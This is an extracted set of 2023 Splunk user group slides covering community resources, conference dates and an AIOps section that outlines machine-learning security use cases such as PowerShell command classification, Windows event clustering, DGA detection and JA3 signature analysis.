  • 6. © 2023 SPLUNK INC. Community Resources ● Find Splunk events and seminars in your region: https://www.splunk.com/en_us/about-us/events.html ● Leverage Splunk Community Resources: Splunk Answers: Submit questions, Search previous answers, Splunk IDEAS: Submit ideas for product enhancements or upvote existing ideas https://www.splunk.com/en_us/community.html ● Check out other Splunk User Groups for interesting topics and ideas Leverage your peers
  • 7. © 2023 SPLUNK INC. Some Sample Topics ● XRDR (Cross Region Disaster Recovery) ● Federated Search ● Ingest Actions & Edge Processor ● Risk Based Alerting ● How Security & O11Y Align ● Building Better Dashboards ● Innovative Vertically Aligned Use Cases (Industry specific use-cases) Please be vocal on what interests you
  • 8. © 2023 SPLUNK INC. .CONF23 - July 17 - 20th Las Vegas, NV
  • 9. © 2023 SPLUNK INC. Please Complete the Survey Help us Drive the focus and direction of this Group!
  • 10. © 2023 SPLUNK INC. Thank You!
  • 11. © 2023 SPLUNK INC. Building AIOps Use Cases in Splunk March 2023
  • 12. © 2023 SPLUNK INC. Splunk App for Data Science & Deep Learning (DSDL) Built for Data Scientists and Splunk Users • Code Examples: Guided model building, testing, and deployment of deep learning frameworks and other data science and machine learning examples and algorithms • Container Management: Containers & models can be productionized for scalability & optimization of resources, e.g. CPU & GPU • Frameworks: PyTorch, Tensorflow, SpaCy, DASK, Rapids, Spark, … • Tools: Jupyter Lab Notebooks, Tensorboard, MLflow, Spark, GIT, … Extensible to operationalize any use case • Open Source: New frameworks & Python Libraries freely available for integration into DSDL via github • Acceleration: Support for GPU accelerated data science, machine learning, deep learning or other inference pipelines Extension for MLTK to operationalize advanced custom AI / ML use cases
  • 13. © 2023 SPLUNK INC. Powershell Command-Line Classification Methods: - Count Tokenization - Logistic regression Technologies: - MLTK - Custom Pre-Trained Model Deployment Requirements: - Labelled dataset Details: - Content Page - ESCU Tokenization and Classification could be applied to a wide range of other data sources: User-Agents? Web access logs?
  • 14. © 2023 SPLUNK INC. Windows Event Code Clustering + Anomaly Detection Methods: - Statistical Analysis - Clustering (DBScan) - Unsupervised Technologies: - MLTK Requirements: - Windows event code data - Well controlled environment Details: - .conf21
  • 15. © 2023 SPLUNK INC. Domain Generation Algorithm Detection Methods: - Feature Engineering - Text Entropy - PCA - Ngram Analysis Technologies: - MLTK/DSDL Requirements: - DNS Data Details: - DGA App - MLTK - ESCU Content - DSDL A very good example of an application of labelled data to a useful classifier in Splunk
  • 16. © 2023 SPLUNK INC. JA3 Signature Analysis Methods: - One-hot Encoding - UMAP Technologies: - DSDL Requirements: - JA3 Signature Data (Zeek) Details: - Blog - Talk (Upcoming) - DSDL Notebook JA3 Signatures are a challenge to understand as they are very high cardinality. UMAP allows visualising a complex high-cardinality space. Could be extended to generic behaviors? Host Classification based on CIM features?